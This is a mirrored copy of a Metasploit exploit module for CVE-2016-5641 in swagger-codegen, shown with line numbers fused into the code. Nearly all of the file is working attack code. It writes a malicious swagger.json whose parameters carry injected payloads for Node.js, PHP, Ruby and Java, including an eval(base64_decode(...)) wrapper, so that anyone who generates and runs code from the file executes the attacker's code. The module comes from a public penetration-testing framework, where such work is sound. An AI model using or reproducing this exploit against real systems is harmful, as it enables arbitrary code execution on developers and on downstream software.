CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/fileformat/swagger_param_inject.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45#6# Gems7#8require 'base64'910#11# Project12#1314class MetasploitModule < Msf::Exploit::Remote15Rank = ExcellentRanking1617include Msf::Exploit::FILEFORMAT1819def initialize(info = {})20super(update_info(info,21'Name' => 'JSON Swagger CodeGen Parameter Injector',22'Description' => %q{23This module generates an Open API Specification 2.0 (Swagger) compliant24json document that includes payload insertion points in parameters.2526In order for the payload to be executed, an attacker must convince27someone to generate code from a specially modified swagger.json file28within a vulnerable swagger-codgen appliance/container/api/service,29and then to execute that generated code (or include it into software30which will later be executed by another victim). By doing so, an31attacker can execute arbitrary code as the victim user. The same32vulnerability exists in the YAML format.33},34'License' => MSF_LICENSE,35'Author' =>36[37'ethersnowman <[email protected]>'38],39'References' =>40[41[ 'CVE', '2016-5641' ],42[ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],43[ 'URL', 'https://www.rapid7.com/blog/post/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]44],45'Platform' => %w{ nodejs php java ruby },46'Arch' => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ],47'Targets' =>48[49['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],50['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],51['Java JSP', { 'Platform' => 'unix', 'Arch' => ARCH_JAVA } ],52['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ]53],54'DisclosureDate' => '2016-06-23',55'DefaultTarget' => 0))5657register_options(58[59OptString.new('FILENAME', [false, 'The file to write.', 'msf-swagger.json']),60OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),61OptString.new('INFO_VERSION', [true, 'Swagger info version.', '1.0.0']),62OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),63OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),64OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),65OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),66OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),67OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),68OptString.new('PATH_RESPONSE_DESCRIPTION', [true, 'Description of a path response object', 'E']),69OptString.new('DEFINITION_DESCRIPTION', [true, 'Description of an object definition.', 'F'])70])71end7273def swagger74%Q(75{76"swagger": "2.0",77"info": {78"description": "#{datastore['INFO_DESCRIPTION']}",79"version": "#{datastore['INFO_VERSION']}",80"title": "#{datastore['INFO_TITLE']}"81},82"schemes": [83"#{datastore['SWAGGER_SCHEME']}"84],85"host": "#{datastore['SWAGGER_HOST']}",86"basePath": "#{datastore['BASE_PATH']}",87"produces": [88"application/json"89],90"consumes": [91"application/json"92],93"paths": {94"#{datastore['PATH']}": {95"get": {96"description": "#{datastore['PATH_DESCRIPTION']}",97"responses": {98"200": {99"description": "#{datastore['PATH_RESPONSE_DESCRIPTION']}",100"schema": {101"$ref": "#/definitions/d"102}103}104}105}106}107},108"definitions": {109"d": {110"type": "object",111"description": "#{datastore['DEFINITION_DESCRIPTION']}",112"properties": {113"id": {114"type": "integer",115"format": "int64"116}117}118}119}120}121)122end123124def exploit125case payload.arch[0]126when 'nodejs'127payload_loc = 'PATH'128payload_prefix = "/a');};};return exports;}));"129payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"130wrapped_payload = payload_prefix + payload.encoded.gsub(/"/, '\\"') + payload_suffix131when 'php'132payload_loc = 'INFO_DESCRIPTION'133payload_prefix = "*/ namespace foobar; eval(base64_decode('"134payload_suffix = "')); /*"135wrapped_payload = payload_prefix +136Base64.strict_encode64(payload.encoded) +137payload_suffix138when 'ruby'139payload_loc = 'INFO_TITLE'140payload_prefix = "=end "141payload_suffix = "=begin "142wrapped_payload = payload_prefix + payload.encoded + payload_suffix143when 'java'144payload_loc = 'PATH'145payload_prefix = %q{a\\\"; "}146p = payload.encoded.gsub(/<%@page import="/, 'import ')147p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')148p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')149wrapped_payload = payload_prefix + p150else151raise IncompatiblePayloadError.new(datastore['PAYLOAD'])152end153154datastore[payload_loc] = wrapped_payload155156print_status swagger157file_create swagger158end159end160161162